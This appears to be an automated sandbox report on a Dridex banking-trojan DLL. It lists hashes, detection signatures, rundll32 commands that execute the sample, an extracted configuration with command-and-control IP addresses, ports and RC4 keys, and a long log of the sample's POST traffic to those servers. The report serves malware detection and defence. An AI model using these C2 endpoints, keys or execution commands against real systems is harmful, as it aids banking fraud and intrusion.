Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.4470.28989

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.4470.28989 (renamed file extension from 28989 to dll)
Analysis ID:510680
MD5:c7cf1a1238e4a42eebf9cd70a5cf091c
SHA1:4ac755ac7e852daa204caced88887bdfce48a57f
SHA256:f0a31b853ed15c70abd7b13ebb381500188e61d4b8fdee1cd2a922d79a4d1e77
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5980 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 4748 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5108 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 456 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5684 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6084 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.341889397.00000000033E0000.00000040.00000010.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000000.00000002.791906460.000000006ED31000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000000.00000003.390619959.0000000000820000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000006.00000003.369249349.0000000001280000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000003.00000003.340472911.0000000000F20000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.6ed30000.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              3.3.rundll32.exe.f3db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                0.3.loaddll32.exe.83db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  6.3.rundll32.exe.129db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    4.3.rundll32.exe.33fdb55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 6.3.rundll32.exe.129db55.0.raw.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Source: SecuriteInfo.com.Variant.Razy.980776.4470.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49757 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:50023 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.4470.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.792034242.000000006EDF7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.816027837.000000006EDF7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.4470.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED5CEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4832Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.5:49754 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.5:49756 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.5:49758 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
